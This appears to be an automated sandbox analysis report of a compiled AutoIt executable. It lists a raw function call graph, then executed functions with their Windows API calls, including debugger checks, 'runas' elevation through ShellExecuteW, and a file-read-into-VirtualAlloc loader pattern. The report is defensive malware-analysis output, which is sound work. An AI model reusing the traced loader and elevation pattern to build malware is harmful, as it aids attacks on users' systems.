187eec 59 API calls 100294->100296 100297 187e8c 59 API calls 100295->100297 100299 18479e 100296->100299 100298 184773 100297->100298 100298->100299 100300 1879ab 59 API calls 100298->100300 100301 1847de 100299->100301 100303 1847bd 100299->100303 100314 1bd924 100299->100314 100304 184794 100300->100304 100391 1879ab 100301->100391 100305 187b52 59 API calls 100303->100305 100308 187e8c 59 API calls 100304->100308 100309 1847c7 100305->100309 100306 1847ef 100310 184801 100306->100310 100312 1881a7 59 API calls 100306->100312 100307 1bd9f4 100311 187d2c 59 API calls 100307->100311 100308->100299 100309->100301 100316 1879ab 59 API calls 100309->100316 100313 184811 100310->100313 100317 1881a7 59 API calls 100310->100317 100327 1bd9b1 100311->100327 100312->100310 100315 184818 100313->100315 100319 1881a7 59 API calls 100313->100319 100314->100307 100318 1bd9dd 100314->100318 100326 1bd95b 100314->100326 100320 1881a7 59 API calls 100315->100320 100329 18481f Mailbox 100315->100329 100316->100301 100317->100313 100318->100307 100323 1bd9c8 100318->100323 100319->100315 100320->100329 100321 187b52 59 API calls 100321->100327 100322 1bd9b9 100324 187d2c 59 API calls 100322->100324 100325 187d2c 59 API calls 100323->100325 100324->100327 100325->100327 100326->100322 100330 1bd9a4 100326->100330 100327->100301 100327->100321 100404 187a84 59 API calls 2 library calls 100327->100404 100329->100188 100331 187d2c 59 API calls 100330->100331 100331->100327 100343->100158 100344->100164 100345->100193 100346->100235 100347->100235 100348->100235 100349->100235 100350->100235 100351->100235 100352->100216 100353->100219 100354->100242 100358 1be181 100357->100358 100359 185e12 CreateFileW 100357->100359 100360 185e34 100358->100360 100361 1be187 CreateFileW 100358->100361 100359->100360 100360->100262 100361->100360 100362 1be1ad 100361->100362 100363 185c4e 2 API calls 100362->100363 100364 1be1b8 100363->100364 100364->100360 100366 18578b 100365->100366 100367 1bdfce 100365->100367 100368 185c4e 2 API calls 100366->100368 100376 18581a 100366->100376 100367->100376 100384 185e3f 100367->100384 100369 1857ad 100368->100369 100370 18538e 59 API calls 100369->100370 100372 1857b7 100370->100372 100372->100367 100373 1857c4 100372->100373 100374 1a0ff6 Mailbox 59 API calls 100373->100374 100375 1857cf 100374->100375 100377 18538e 59 API calls 100375->100377 100376->100264 100378 1857da 100377->100378 100379 185d20 2 API calls 100378->100379 100380 185807 100379->100380 100381 185c4e 2 API calls 100380->100381 100381->100376 100382->100267 100383->100270 100385 185c4e 2 API calls 100384->100385 100386 185e60 100385->100386 100387 185c4e 2 API calls 100386->100387 100388 185e74 100387->100388 100388->100376 100389->100280 100390->100279 100392 1879ba 100391->100392 100393 187a17 100391->100393 100392->100393 100395 1879c5 100392->100395 100394 187e8c 59 API calls 100393->100394 100400 1879e8 _memmove 100394->100400 100396 1879e0 100395->100396 100397 1bef32 100395->100397 100405 188087 59 API calls Mailbox 100396->100405 100399 188189 59 API calls 100397->100399 100401 1bef3c 100399->100401 100400->100306 100402 1a0ff6 Mailbox 59 API calls 100401->100402 100403 1bef5c 100402->100403 100404->100327 100405->100400 100407 186ef5 100406->100407 100412 187009 100406->100412 100408 1a0ff6 Mailbox 59 API calls 100407->100408 100407->100412 100409 186f1c 100408->100409 100410 1a0ff6 Mailbox 59 API calls 100409->100410 100416 186f91 100410->100416 100412->99115 100416->100412 100419 1863a0 100416->100419 100445 1874bd 59 API calls Mailbox 100416->100445 100446 1d6ac9 59 API calls Mailbox 100416->100446 100447 18766f 59 API calls 2 library calls 100416->100447 100417->99117 100418->99119 100448 187b76 100419->100448 100421 1865ca 100455 18766f 59 API calls 2 library calls 100421->100455 100423 1865e4 Mailbox 100423->100416 100426 18766f 59 API calls 100437 1863c5 100426->100437 100427 1be41f 100458 1dfdba 91 API calls 4 library calls 100427->100458 100429 1868f9 100429->100423 100460 1dfdba 91 API calls 4 library calls 100429->100460 100432 187eec 59 API calls 100432->100437 100433 1be42d 100459 18766f 59 API calls 2 library calls 100433->100459 100436 1be3bb 100438 188189 59 API calls 100436->100438 100437->100421 100437->100426 100437->100427 100437->100429 100437->100432 100437->100436 100441 187faf 59 API calls 100437->100441 100444 1be3eb _memmove 100437->100444 100453 1860cc 60 API calls 100437->100453 100454 185ea1 59 API calls Mailbox 100437->100454 100456 185fd2 60 API calls 100437->100456 100457 187a84 59 API calls 2 library calls 100437->100457 100440 1be3c6 100438->100440 100442 18659b CharUpperBuffW 100441->100442 100442->100437 100444->100427 100444->100429 100445->100416 100446->100416 100447->100416 100449 1a0ff6 Mailbox 59 API calls 100448->100449 100450 187b9b 100449->100450 100451 188189 59 API calls 100450->100451 100452 187baa 100451->100452 100452->100437 100453->100437 100454->100437 100455->100423 100456->100437 100457->100437 100458->100433 100460->100423 100461->99133 100462->99134 100464 1bd638 100463->100464 100465 184227 100463->100465 100464->100465 100466 1bd641 DestroyIcon 100464->100466 100465->99140 100489 1e3226 62 API calls _W_store_winword 100465->100489 100466->100465 100489->99140 100551->99162 100552->99162 100553->99162 100958 1c0226 100960 18ade2 Mailbox 100958->100960 100959 18b6c1 101073 1ea0b5 89 API calls 4 library calls 100959->101073 100960->100959 100962 1c0c86 100960->100962 100964 1c0c8f 100960->100964 100966 1c00e0 VariantClear 100960->100966 100972 1ed2e6 100960->100972 101019 1fe237 100960->101019 101022 192123 100960->101022 101062 1f474d 100960->101062 101071 189df0 59 API calls Mailbox 100960->101071 101072 1d7405 59 API calls 100960->101072 101074 1d66f4 100962->101074 100966->100960 100973 1ed310 100972->100973 100974 1ed305 100972->100974 100978 1877c7 59 API calls 100973->100978 101017 1ed3ea Mailbox 100973->101017 101077 189c9c 59 API calls 100974->101077 100976 1a0ff6 Mailbox 59 API calls 100977 1ed433 100976->100977 100979 1ed43f 100977->100979 101080 185906 60 API calls Mailbox 100977->101080 100980 1ed334 100978->100980 100983 189997 84 API calls 100979->100983 100982 1877c7 59 API calls 100980->100982 100984 1ed33d 100982->100984 100985 1ed457 100983->100985 100986 189997 84 API calls 100984->100986 100987 185956 67 API calls 100985->100987 100988 1ed349 100986->100988 100989 1ed466 100987->100989 100990 1846f9 59 API calls 100988->100990 100991 1ed49e 100989->100991 100992 1ed46a GetLastError 100989->100992 100993 1ed35e 100990->100993 100996 1ed4c9 100991->100996 100997 1ed500 100991->100997 100994 1ed483 100992->100994 100995 187c8e 59 API calls 100993->100995 101008 1ed3f3 Mailbox 100994->101008 101081 185a1a CloseHandle 100994->101081 100998 1ed391 100995->100998 101001 1a0ff6 Mailbox 59 API calls 100996->101001 101000 1a0ff6 Mailbox 59 API calls 100997->101000 100999 1ed3e3 100998->100999 101002 1e3e73 3 API calls 100998->101002 101079 189c9c 59 API calls 100999->101079 101003 1ed505 101000->101003 101004 1ed4ce 101001->101004 101007 1ed3a1 101002->101007 101003->101008 101011 1877c7 59 API calls 101003->101011 101009 1ed4df 101004->101009 101012 1877c7 59 API calls 101004->101012 101007->100999 101010 1ed3a5 101007->101010 101008->100960 101082 1ef835 59 API calls 2 library calls 101009->101082 101014 187f41 59 API calls 101010->101014 101011->101008 101012->101009 101015 1ed3b2 101014->101015 101078 1e3c66 63 API calls Mailbox 101015->101078 101017->100976 101017->101008 101018 1ed3bb Mailbox 101018->100999 101020 1fcdf1 130 API calls 101019->101020 101021 1fe247 101020->101021 101021->100960 101083 189bf8 101022->101083 101025 1a0ff6 Mailbox 59 API calls 101027 192154 101025->101027 101030 192164 101027->101030 101111 185906 60 API calls Mailbox 101027->101111 101028 1c69af 101029 192189 101028->101029 101115 1ef7df 59 API calls 101028->101115 101038 192196 101029->101038 101116 189c9c 59 API calls 101029->101116 101032 189997 84 API calls 101030->101032 101034 192172 101032->101034 101036 185956 67 API calls 101034->101036 101035 1c69f7 101037 1c69ff 101035->101037 101035->101038 101039 192181 101036->101039 101117 189c9c 59 API calls 101037->101117 101041 185e3f 2 API calls 101038->101041 101039->101028 101039->101029 101114 185a1a CloseHandle 101039->101114 101043 19219d 101041->101043 101044 1c6a11 101043->101044 101045 1921b7 101043->101045 101047 1a0ff6 Mailbox 59 API calls 101044->101047 101046 1877c7 59 API calls 101045->101046 101048 1921bf 101046->101048 101049 1c6a17 101047->101049 101096 1856d2 101048->101096 101051 1c6a2b 101049->101051 101118 1859b0 ReadFile SetFilePointerEx 101049->101118 101056 1c6a2f _memmove 101051->101056 101119 1e794e 59 API calls 2 library calls 101051->101119 101053 1921ce 101053->101056 101112 189b9c 59 API calls Mailbox 101053->101112 101057 1921e2 Mailbox 101058 19221c 101057->101058 101059 185dcf CloseHandle 101057->101059 101058->100960 101060 192210 101059->101060 101060->101058 101113 185a1a CloseHandle 101060->101113 101063 189997 84 API calls 101062->101063 101064 1f4787 101063->101064 101065 1863a0 94 API calls 101064->101065 101066 1f4797 101065->101066 101067 18a000 341 API calls 101066->101067 101068 1f47bc 101066->101068 101067->101068 101069 189bf8 59 API calls 101068->101069 101070 1f47c0 101068->101070 101069->101070 101070->100960 101071->100960 101072->100960 101073->100962 101123 1d6636 101074->101123 101076 1d6702 101076->100964 101077->100973 101078->101018 101079->101017 101080->100979 101081->101008 101082->101008 101084 1bfbff 101083->101084 101087 189c08 101083->101087 101085 1bfc10 101084->101085 101088 187d2c 59 API calls 101084->101088 101086 187eec 59 API calls 101085->101086 101089 1bfc1a 101086->101089 101090 1a0ff6 Mailbox 59 API calls 101087->101090 101088->101085 101093 189c34 101089->101093 101094 1877c7 59 API calls 101089->101094 101091 189c1b 101090->101091 101091->101089 101092 189c26 101091->101092 101092->101093 101095 187f41 59 API calls 101092->101095 101093->101025 101093->101028 101094->101093 101095->101093 101097 1856dd 101096->101097 101098 185702 101096->101098 101097->101098 101101 1856ec 101097->101101 101099 187eec 59 API calls 101098->101099 101107 1e349a 101099->101107 101102 185c18 59 API calls 101101->101102 101103 1e35ba 101102->101103 101106 185632 61 API calls 101103->101106 101105 1e34c9 101105->101053 101108 1e35c8 101106->101108 101107->101105 101120 1e3436 ReadFile SetFilePointerEx 101107->101120 101121 187a84 59 API calls 2 library calls 101107->101121 101110 1e35d8 Mailbox 101108->101110 101122 18793a 61 API calls Mailbox 101108->101122 101110->101053 101111->101030 101112->101057 101113->101058 101114->101028 101115->101028 101116->101035 101117->101043 101118->101051 101119->101056 101120->101107 101121->101107 101122->101110 101124 1d665e 101123->101124 101125 1d6641 101123->101125 101124->101076 101125->101124 101127 1d6621 59 API calls Mailbox 101125->101127 101127->101125 101128 183633 101129 18366a 101128->101129 101130 183688 101129->101130 101131 1836e7 101129->101131 101168 1836e5 101129->101168 101132 18375d PostQuitMessage 101130->101132 101133 183695 101130->101133 101135 1836ed 101131->101135 101136 1bd31c 101131->101136 101169 1836d8 101132->101169 101137 1bd38f 101133->101137 101138 1836a0 101133->101138 101134 1836ca DefWindowProcW 101134->101169 101140 1836f2 101135->101140 101141 183715 SetTimer RegisterWindowMessageW 101135->101141 101178 1911d0 10 API calls Mailbox 101136->101178 101182 1e2a16 71 API calls _memset 101137->101182 101144 1836a8 101138->101144 101145 183767 101138->101145 101142 1836f9 KillTimer 101140->101142 101143 1bd2bf 101140->101143 101146 18373e CreatePopupMenu 101141->101146 101141->101169 101173 1844cb Shell_NotifyIconW _memset 101142->101173 101154 1bd2f8 MoveWindow 101143->101154 101155 1bd2c4 101143->101155 101150 1836b3 101144->101150 101151 1bd374 101144->101151 101176 184531 64 API calls _memset 101145->101176 101146->101169 101148 1bd343 101179 1911f3 341 API calls Mailbox 101148->101179 101159 18374b 101150->101159 101160 1836be 101150->101160 101151->101134 101181 1d817e 59 API calls Mailbox 101151->101181 101154->101169 101156 1bd2c8 101155->101156 101157 1bd2e7 SetFocus 101155->101157 101156->101160 101163 1bd2d1 101156->101163 101157->101169 101158 18370c 101174 183114 DeleteObject DestroyWindow Mailbox 101158->101174 101175 1845df 81 API calls _memset 101159->101175 101160->101134 101180 1844cb Shell_NotifyIconW _memset 101160->101180 101161 1bd3a1 101161->101134 101161->101169 101162 18375b 101162->101169 101177 1911d0 10 API calls Mailbox 101163->101177 101168->101134 101171 1bd368 101172 1843db 68 API calls 101171->101172 101172->101168 101173->101158 101174->101169 101175->101162 101176->101162 101177->101169 101178->101148 101179->101160 101180->101171 101181->101168 101182->101161 101183 14029bb 101184 14029c0 101183->101184 101185 1400000 GetPEB 101184->101185 101186 14029cc 101185->101186 101187 1402a80 101186->101187 101188 14029ea 101186->101188 101205 1403330 9 API calls 101187->101205 101192 1402690 101188->101192 101191 1402a67 101193 1400000 GetPEB 101192->101193 101202 140272f 101193->101202 101195 1402760 CreateFileW 101197 140276d 101195->101197 101195->101202 101196 1402789 VirtualAlloc 101196->101197 101198 14027aa ReadFile 101196->101198 101199 140298a 101197->101199 101200 140297c VirtualFree 101197->101200 101198->101197 101201 14027c8 VirtualAlloc 101198->101201 101199->101191 101200->101199 101201->101197 101201->101202 101202->101196 101202->101197 101203 1402890 FindCloseChangeNotification 101202->101203 101204 14028a0 VirtualFree 101202->101204 101206 14035a0 GetPEB 101202->101206 101203->101202 101204->101202 101205->101191 101207 14035ca 101206->101207 101207->101195 101208 181055 101213 182649 101208->101213 101211 1a2f80 __cinit 67 API calls 101212 181064 101211->101212 101214 1877c7 59 API calls 101213->101214 101215 1826b7 101214->101215 101220 183582 101215->101220 101218 182754 101219 18105a 101218->101219 101223 183416 59 API calls 2 library calls 101218->101223 101219->101211 101224 1835b0 101220->101224 101223->101218 101225 1835bd 101224->101225 101226 1835a1 101224->101226 101225->101226 101227 1835c4 RegOpenKeyExW 101225->101227 101226->101218 101227->101226 101228 1835de RegQueryValueExW 101227->101228 101229 183614 RegCloseKey 101228->101229 101230 1835ff 101228->101230 101229->101226 101230->101229 101231 1bff06 101232 1bff10 101231->101232 101271 18ac90 Mailbox _memmove 101231->101271 101330 188e34 59 API calls Mailbox 101232->101330 101237 1a0ff6 59 API calls Mailbox 101257 18a097 Mailbox 101237->101257 101240 18b5d5 101242 1881a7 59 API calls 101240->101242 101253 18a1b7 101242->101253 101243 1c047f 101334 1ea0b5 89 API calls 4 library calls 101243->101334 101244 18b5da 101340 1ea0b5 89 API calls 4 library calls 101244->101340 101247 187f41 59 API calls 101247->101271 101248 1881a7 59 API calls 101248->101257 101249 1c048e 101250 1877c7 59 API calls 101250->101257 101251 1d7405 59 API calls 101251->101257 101252 1a2f80 67 API calls __cinit 101252->101257 101255 1d66f4 Mailbox 59 API calls 101255->101253 101256 1c0e00 101339 1ea0b5 89 API calls 4 library calls 101256->101339 101257->101237 101257->101240 101257->101243 101257->101244 101257->101248 101257->101250 101257->101251 101257->101252 101257->101253 101257->101256 101260 18a6ba 101257->101260 101324 18ca20 341 API calls 2 library calls 101257->101324 101325 18ba60 60 API calls Mailbox 101257->101325 101259 1fbf80 341 API calls 101259->101271 101338 1ea0b5 89 API calls 4 library calls 101260->101338 101261 1d66f4 Mailbox 59 API calls 101261->101271 101262 18b416 101329 18f803 341 API calls 101262->101329 101264 18a000 341 API calls 101264->101271 101265 1c0c94 101336 189df0 59 API calls Mailbox 101265->101336 101267 1c0ca2 101337 1ea0b5 89 API calls 4 library calls 101267->101337 101269 1c0c86 101269->101253 101269->101255 101270 18b37c 101327 189e9c 60 API calls Mailbox 101270->101327 101271->101247 101271->101253 101271->101257 101271->101259 101271->101261 101271->101262 101271->101264 101271->101265 101271->101267 101271->101270 101273 1a0ff6 59 API calls Mailbox 101271->101273 101277 18b685 101271->101277 101280 18ade2 Mailbox 101271->101280 101286 1fc5f4 101271->101286 101318 1e7be0 101271->101318 101331 1d7405 59 API calls 101271->101331 101332 1fc4a7 85 API calls 2 library calls 101271->101332 101273->101271 101274 18b38d 101328 189e9c 60 API calls Mailbox 101274->101328 101335 1ea0b5 89 API calls 4 library calls 101277->101335 101280->101253 101280->101269 101280->101277 101281 1c00e0 VariantClear 101280->101281 101282 1f474d 341 API calls 101280->101282 101283 1ed2e6 101 API calls 101280->101283 101284 1fe237 130 API calls 101280->101284 101285 192123 95 API calls 101280->101285 101326 189df0 59 API calls Mailbox 101280->101326 101333 1d7405 59 API calls 101280->101333 101281->101280 101282->101280 101283->101280 101284->101280 101285->101280 101287 1877c7 59 API calls 101286->101287 101288 1fc608 101287->101288 101289 1877c7 59 API calls 101288->101289 101290 1fc610 101289->101290 101291 1877c7 59 API calls 101290->101291 101292 1fc618 101291->101292 101293 189997 84 API calls 101292->101293 101294 1fc626 101293->101294 101295 1fc83c Mailbox 101294->101295 101296 187d2c 59 API calls 101294->101296 101297 1fc80f 101294->101297 101299 1fc7f6 101294->101299 101301 1fc811 101294->101301 101302 1881a7 59 API calls 101294->101302 101304 187a84 59 API calls 101294->101304 101306 187faf 59 API calls 101294->101306 101311 187faf 59 API calls 101294->101311 101315 189997 84 API calls 101294->101315 101316 187e0b 59 API calls 101294->101316 101317 187c8e 59 API calls 101294->101317 101295->101271 101296->101294 101297->101295 101343 189b9c 59 API calls Mailbox 101297->101343 101300 187e0b 59 API calls 101299->101300 101303 1fc803 101300->101303 101305 187e0b 59 API calls 101301->101305 101302->101294 101307 187c8e 59 API calls 101303->101307 101304->101294 101308 1fc820 101305->101308 101309 1fc6bd CharUpperBuffW 101306->101309 101307->101297 101310 187c8e 59 API calls 101308->101310 101341 18859a 68 API calls 101309->101341 101310->101297 101313 1fc77d CharUpperBuffW 101311->101313 101342 18c707 69 API calls 2 library calls 101313->101342 101315->101294 101316->101294 101317->101294 101319 1e7bec 101318->101319 101320 1a0ff6 Mailbox 59 API calls 101319->101320 101321 1e7bfa 101320->101321 101322 1877c7 59 API calls 101321->101322 101323 1e7c08 101321->101323 101322->101323 101323->101271 101324->101257 101325->101257 101326->101280 101327->101274 101328->101262 101329->101277 101330->101271 101331->101271 101332->101271 101333->101280 101334->101249 101335->101269 101336->101269 101337->101269 101338->101253 101339->101244 101340->101253 101341->101294 101342->101294 101343->101295 101344 181016 101349 184ad2 101344->101349 101347 1a2f80 __cinit 67 API calls 101348 181025 101347->101348 101350 1a0ff6 Mailbox 59 API calls 101349->101350 101351 184ada 101350->101351 101352 18101b 101351->101352 101356 184a94 101351->101356 101352->101347 101357 184a9d 101356->101357 101359 184aaf 101356->101359 101358 1a2f80 __cinit 67 API calls 101357->101358 101358->101359 101360 184afe 101359->101360 101361 1877c7 59 API calls 101360->101361 101362 184b16 GetVersionExW 101361->101362 101363 187d2c 59 API calls 101362->101363 101364 184b59 101363->101364 101365 187e8c 59 API calls 101364->101365 101370 184b86 101364->101370 101366 184b7a 101365->101366 101367 187886 59 API calls 101366->101367 101367->101370 101368 184bf1 GetCurrentProcess IsWow64Process 101369 184c0a 101368->101369 101372 184c89 GetSystemInfo 101369->101372 101373 184c20 101369->101373 101370->101368 101371 1bdc8d 101370->101371 101375 184c56 101372->101375 101384 184c95 101373->101384 101375->101352 101377 184c7d GetSystemInfo 101380 184c47 101377->101380 101378 184c32 101379 184c95 2 API calls 101378->101379 101381 184c3a GetNativeSystemInfo 101379->101381 101380->101375 101382 184c4d FreeLibrary 101380->101382 101381->101380 101382->101375 101385 184c2e 101384->101385 101386 184c9e LoadLibraryA 101384->101386 101385->101377 101385->101378 101386->101385 101387 184caf GetProcAddress 101386->101387 101387->101385 101388 181066 101393 18f8cf 101388->101393 101390 18106c 101391 1a2f80 __cinit 67 API calls 101390->101391 101392 181076 101391->101392 101394 18f8f0 101393->101394 101426 1a0143 101394->101426 101398 18f937 101399 1877c7 59 API calls 101398->101399 101400 18f941 101399->101400 101401 1877c7 59 API calls 101400->101401 101402 18f94b 101401->101402 101403 1877c7 59 API calls 101402->101403 101404 18f955 101403->101404 101405 1877c7 59 API calls 101404->101405 101406 18f993 101405->101406 101407 1877c7 59 API calls 101406->101407 101408 18fa5e 101407->101408 101436 1960e7 101408->101436 101412 18fa90 101413 1877c7 59 API calls 101412->101413 101414 18fa9a 101413->101414 101464 19ffde 101414->101464 101416 18fae1 101417 18faf1 GetStdHandle 101416->101417 101418 18fb3d 101417->101418 101419 1c49d5 101417->101419 101421 18fb45 OleInitialize 101418->101421 101419->101418 101420 1c49de 101419->101420 101471 1e6dda 64 API calls Mailbox 101420->101471 101421->101390 101423 1c49e5 101472 1e74a9 CreateThread 101423->101472 101425 1c49f1 CloseHandle 101425->101421 101473 1a021c 101426->101473 101429 1a021c 59 API calls 101430 1a0185 101429->101430 101431 1877c7 59 API calls 101430->101431 101432 1a0191 101431->101432 101433 187d2c 59 API calls 101432->101433 101434 18f8f6 101433->101434 101435 1a03a2 6 API calls 101434->101435 101435->101398 101437 1877c7 59 API calls 101436->101437 101438 1960f7 101437->101438 101439 1877c7 59 API calls 101438->101439 101440 1960ff 101439->101440 101480 195bfd 101440->101480 101443 195bfd 59 API calls 101444 19610f 101443->101444 101445 1877c7 59 API calls 101444->101445 101446 19611a 101445->101446 101447 1a0ff6 Mailbox 59 API calls 101446->101447 101448 18fa68 101447->101448 101449 196259 101448->101449 101450 196267 101449->101450 101451 1877c7 59 API calls 101450->101451 101452 196272 101451->101452 101453 1877c7 59 API calls 101452->101453 101454 19627d 101453->101454 101455 1877c7 59 API calls 101454->101455 101456 196288 101455->101456 101457 1877c7 59 API calls 101456->101457 101458 196293 101457->101458 101459 195bfd 59 API calls 101458->101459 101460 19629e 101459->101460 101461 1a0ff6 Mailbox 59 API calls 101460->101461 101462 1962a5 RegisterWindowMessageW 101461->101462 101462->101412 101465 19ffee 101464->101465 101466 1d5cc3 101464->101466 101467 1a0ff6 Mailbox 59 API calls 101465->101467 101483 1e9d71 60 API calls 101466->101483 101469 19fff6 101467->101469 101469->101416 101470 1d5cce 101471->101423 101472->101425 101484 1e748f 65 API calls 101472->101484 101474 1877c7 59 API calls 101473->101474 101475 1a0227 101474->101475 101476 1877c7 59 API calls 101475->101476 101477 1a022f 101476->101477 101478 1877c7 59 API calls 101477->101478 101479 1a017b 101478->101479 101479->101429 101481 1877c7 59 API calls 101480->101481 101482 195c05 101481->101482 101482->101443 101483->101470

              Executed Functions

              Function 00183B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00183B7A
              • IsDebuggerPresent.KERNEL32 ref: 00183B8C
              • GetFullPathNameW.KERNEL32(00007FFF,?,?,002462F8,002462E0,?,?), ref: 00183BFD
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
                • Part of subcall function 00190A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00183C26,002462F8,?,?,?), ref: 00190ACE
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00183C81
              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,002393F0,00000010), ref: 001BD4BC
              • SetCurrentDirectoryW.KERNEL32(?,002462F8,?,?,?), ref: 001BD4F4
              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00235D40,002462F8,?,?,?), ref: 001BD57A
              • ShellExecuteW.SHELL32(00000000,?,?), ref: 001BD581
                • Part of subcall function 00183A58: GetSysColorBrush.USER32(0000000F), ref: 00183A62
                • Part of subcall function 00183A58: LoadCursorW.USER32(00000000,00007F00), ref: 00183A71
                • Part of subcall function 00183A58: LoadIconW.USER32(00000063), ref: 00183A88
                • Part of subcall function 00183A58: LoadIconW.USER32(000000A4), ref: 00183A9A
                • Part of subcall function 00183A58: LoadIconW.USER32(000000A2), ref: 00183AAC
                • Part of subcall function 00183A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00183AD2
                • Part of subcall function 00183A58: RegisterClassExW.USER32(?), ref: 00183B28
                • Part of subcall function 001839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00183A15
                • Part of subcall function 001839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00183A36
                • Part of subcall function 001839E7: ShowWindow.USER32(00000000,?,?), ref: 00183A4A
                • Part of subcall function 001839E7: ShowWindow.USER32(00000000,?,?), ref: 00183A53
                • Part of subcall function 001843DB: _memset.LIBCMT ref: 00184401
                • Part of subcall function 001843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001844A6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
              • String ID: This is a third-party compiled AutoIt script.$runas$%!
              • API String ID: 529118366-3827880107
              • Opcode ID: 70ca3a09d9a3e62979c77097ef46b5d6f9b7412449b4b016a389ce70e19f73c9
              • Instruction ID: 03ca745203fd0f668a7f44f54045550274a702e47ee4da4dd2169077d9400387
              • Opcode Fuzzy Hash: 70ca3a09d9a3e62979c77097ef46b5d6f9b7412449b4b016a389ce70e19f73c9
              • Instruction Fuzzy Hash: 4951E374A04249BFCF1AFBB4EC4DAED7B74AB16700F144165F861A21A2DBB08745CF22
              Function 00184AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1037 184afe-184b5e call 1877c7 GetVersionExW call 187d2c 1042 184c69-184c6b 1037->1042 1043 184b64 1037->1043 1044 1bdb90-1bdb9c 1042->1044 1045 184b67-184b6c 1043->1045 1048 1bdb9d-1bdba1 1044->1048 1046 184c70-184c71 1045->1046 1047 184b72 1045->1047 1051 184b73-184baa call 187e8c call 187886 1046->1051 1047->1051 1049 1bdba3 1048->1049 1050 1bdba4-1bdbb0 1048->1050 1049->1050 1050->1048 1052 1bdbb2-1bdbb7 1050->1052 1060 1bdc8d-1bdc90 1051->1060 1061 184bb0-184bb1 1051->1061 1052->1045 1054 1bdbbd-1bdbc4 1052->1054 1054->1044 1056 1bdbc6 1054->1056 1059 1bdbcb-1bdbce 1056->1059 1062 184bf1-184c08 GetCurrentProcess IsWow64Process 1059->1062 1063 1bdbd4-1bdbf2 1059->1063 1064 1bdca9-1bdcad 1060->1064 1065 1bdc92 1060->1065 1061->1059 1066 184bb7-184bc2 1061->1066 1073 184c0a 1062->1073 1074 184c0d-184c1e 1062->1074 1063->1062 1067 1bdbf8-1bdbfe 1063->1067 1071 1bdc98-1bdca1 1064->1071 1072 1bdcaf-1bdcb8 1064->1072 1068 1bdc95 1065->1068 1069 184bc8-184bca 1066->1069 1070 1bdc13-1bdc19 1066->1070 1075 1bdc08-1bdc0e 1067->1075 1076 1bdc00-1bdc03 1067->1076 1068->1071 1077 1bdc2e-1bdc3a 1069->1077 1078 184bd0-184bd3 1069->1078 1079 1bdc1b-1bdc1e 1070->1079 1080 1bdc23-1bdc29 1070->1080 1071->1064 1072->1068 1081 1bdcba-1bdcbd 1072->1081 1073->1074 1082 184c89-184c93 GetSystemInfo 1074->1082 1083 184c20-184c30 call 184c95 1074->1083 1075->1062 1076->1062 1088 1bdc3c-1bdc3f 1077->1088 1089 1bdc44-1bdc4a 1077->1089 1085 1bdc5a-1bdc5d 1078->1085 1086 184bd9-184be8 1078->1086 1079->1062 1080->1062 1081->1071 1087 184c56-184c66 1082->1087 1094 184c7d-184c87 GetSystemInfo 1083->1094 1095 184c32-184c3f call 184c95 1083->1095 1085->1062 1091 1bdc63-1bdc78 1085->1091 1092 1bdc4f-1bdc55 1086->1092 1093 184bee 1086->1093 1088->1062 1089->1062 1096 1bdc7a-1bdc7d 1091->1096 1097 1bdc82-1bdc88 1091->1097 1092->1062 1093->1062 1099 184c47-184c4b 1094->1099 1102 184c41-184c45 GetNativeSystemInfo 1095->1102 1103 184c76-184c7b 1095->1103 1096->1062 1097->1062 1099->1087 1101 184c4d-184c50 FreeLibrary 1099->1101 1101->1087 1102->1099 1103->1102
              APIs
              • GetVersionExW.KERNEL32(?), ref: 00184B2B
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
              • GetCurrentProcess.KERNEL32(?,0020FAEC,00000000,00000000,?), ref: 00184BF8
              • IsWow64Process.KERNEL32(00000000), ref: 00184BFF
              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00184C45
              • FreeLibrary.KERNEL32(00000000), ref: 00184C50
              • GetSystemInfo.KERNEL32(00000000), ref: 00184C81
              • GetSystemInfo.KERNEL32(00000000), ref: 00184C8D
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
